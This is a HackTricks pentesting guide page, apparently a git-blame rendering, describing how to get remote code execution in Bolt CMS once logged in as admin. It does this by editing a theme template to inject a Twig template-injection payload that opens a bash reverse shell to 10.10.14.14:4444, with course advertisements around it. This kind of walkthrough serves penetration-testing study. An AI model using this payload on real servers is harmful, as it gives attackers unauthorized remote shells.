hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md

52 lines
3.3 KiB
Markdown
Raw Permalink Normal View History

# Bolt CMS
2024-07-19 09:08:05 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2024-07-19 09:08:05 +00:00
<details>
2024-07-19 09:08:05 +00:00
<summary>Support HackTricks</summary>
2024-01-02 18:28:27 +00:00
2024-07-19 09:08:05 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
2024-07-19 09:08:05 +00:00
{% endhint %}
## RCE
After login as admin (go to /bot lo access the login prompt), you can get RCE in Bolt CMS:
* Select `Configuration` -> `View Configuration` -> `Main Configuration` or go the the URL path `/bolt/file-edit/config?file=/bolt/config.yaml`
* Check the value of theme
2024-05-05 17:56:05 +00:00
<figure><img src="../../.gitbook/assets/image (771).png" alt=""><figcaption></figcaption></figure>
* Select `File management` -> `View & edit templates`
* Select the theme base found in the previous (`base-2021` in this case) step and select `index.twig`
* In my case this is in the URL path /bolt/file-edit/themes?file=/base-2021/index.twig
* Set your payload in this file via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), like: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
* And save changes
2024-05-05 17:56:05 +00:00
<figure><img src="../../.gitbook/assets/image (948).png" alt=""><figcaption></figcaption></figure>
* Clear the cache in `Maintenance` -> `Clear the cache`
* Access again the page as a regular user, and the payload should be executed
2024-07-19 09:08:05 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2024-07-19 09:08:05 +00:00
<details>
2024-07-19 09:08:05 +00:00
<summary>Support HackTricks</summary>
2024-01-02 18:28:27 +00:00
2024-07-19 09:08:05 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
2024-07-19 09:08:05 +00:00
{% endhint %}